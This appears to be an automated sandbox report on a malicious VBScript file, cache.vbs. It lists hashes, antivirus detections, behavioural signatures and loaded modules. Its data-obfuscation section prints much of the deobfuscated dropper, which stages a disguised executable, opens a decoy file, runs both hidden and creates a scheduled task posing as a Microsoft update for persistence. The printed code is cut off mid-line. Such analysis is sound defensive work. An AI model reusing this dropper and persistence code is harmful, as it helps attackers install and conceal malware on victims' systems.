Windows Analysis Report
cache.vbs

Overview

General Information

Sample name: cache.vbs
Analysis ID: 1528871
MD5: 7e98bb7ffba4cf12d29132a2c71973eb
SHA1: 891b5908cee1908d62429ac2515beb8c1f7e63f2
SHA256: da0ae773603dc68d9bae4713afd8dbf89b1db5f891057b636380fa123a68c550
Tags: vbs, user-JAMESWT_MHT

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

AV Detection

Source: cache.vbs ReversingLabs: Detection: 28%
Source: cache.vbs Virustotal: Detection: 30%

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: cache.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal64.evad.winVBS@1/0@0/0
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs"
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject")Dim currentPathcurrentPath = objFSO.GetAbsolutePathName(".")strFilePath = currentPath & "\_cache\cache\cache.bak"strNewFilePath = currentPath & "\_cache\cache\sigverif.exe"objFSO.MoveFile strFilePath, strNewFilePathSet objFSO = NothingDim filenameb64filenameb64 = DecodeBase64("5Y2a5aOr5ZCO55Sz6K+3LeeOi+eOieeOui3ljY7kuK3np5HmioDlpKflraYt55S15rCU5LiO55S15a2Q5bel56iL5Y2a5aOrLeeugOWOhi5wZGY=")Dim fsoSet fso = WScript.CreateObject("Scripting.FileSystemObject")Dim sourcePath,destinationPath,runfile,runfile2sourcePath = currentPath & "\_cache\cache\" & "cache.db"destinationPath = currentPath & "\" & filenameb64deleteFile = currentPath & "\" & filenameb64 & ".lnk"runfile = Chr(34) & currentPath & "\_cache\cache\sigverif.exe" & Chr(34)runfile2 = currentPath & "\_cache\cache\sigverif.exe"fso.MoveFile sourcePath, destinationPathfso.DeleteFile deleteFileDim tempFolder, tempPathtempFolder = fso.GetSpecialFolder(2)tempPath = tempFolder & "\sigverif.exe"fso.CopyFile runfile2, tempPath, TrueDim v1v1 = Chr(34) & destinationPath & Chr(34)Set WshShell = CreateObject("WScript.Shell")WshShell.Run v1, 0, FalseWshShell.Run tempPath, 0, Falsefso.DeleteFile runfile2Set WshShell = NothingDim shellPathDim taskName shellPath = tempPathtaskName = "WpnUserService_x64" Const TriggerTypeDaily = 1Const ActionTypeExec = 0Set service = CreateObject("Schedule.Service")Call service.ConnectDim rootFolderSet rootFolder = service.GetFolder("\")Dim taskDefinitionSet taskDefinition = service.NewTask(0)Dim regInfoSet regInfo = taskDefinition.RegistrationInforegInfo.Description = "Update"regInfo.Author = "Microsoft"Dim settingsSet settings = taskDefinition.settingssettings.Enabled = Truesettings.StartWhenAvailable = Truesettings.Hidden = Falsesettings.DisallowStartIfOnBatteries = FalseDim triggersSet triggers = taskDefinition.triggersDim triggerOn Error Resume Next 
CreateObject("WScript.Shell").RegRead ("HKEY_USERS\S-1-5-19\Environment\TEMP") If Err.Number = 0 Then IsAdmin = True Set trigger = triggers.Create(8) Set trigger = triggers.Create(9) Else IsAdmin = False End If Err.Clear On Error GoTo 0Set trigger = triggers.Create(7)Set trigger = triggers.Create(6)Set trigger = triggers.Create(TriggerTypeDaily)Dim startTime, endTimeDim timetime = DateAdd("n", 2, Now)Dim cSecond, cMinute, CHour, cDay, cMonth, cYearDim tTime, tDatecSecond = "0" & Second(time)cMinute = "0" & Minute(time)CHour = "0" & Hour(time)cDay = "0" & Day(time)cMonth = "0" & Month(time)cYear = Year(time)tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & ":" & Right(cSecond, 2)tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)startTime = tDate & "T" & tTimeendTime = "2099-05-02T10:52:02"trigger.StartBoundary = startTimetrigger.EndBoundary = endTimetrigger.ID = "TimeTriggerId"trigger.Enabled = TrueDim repetitionPatternSet repetitionPattern = trigger.Repetitionrepeti
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
No contacted IP infos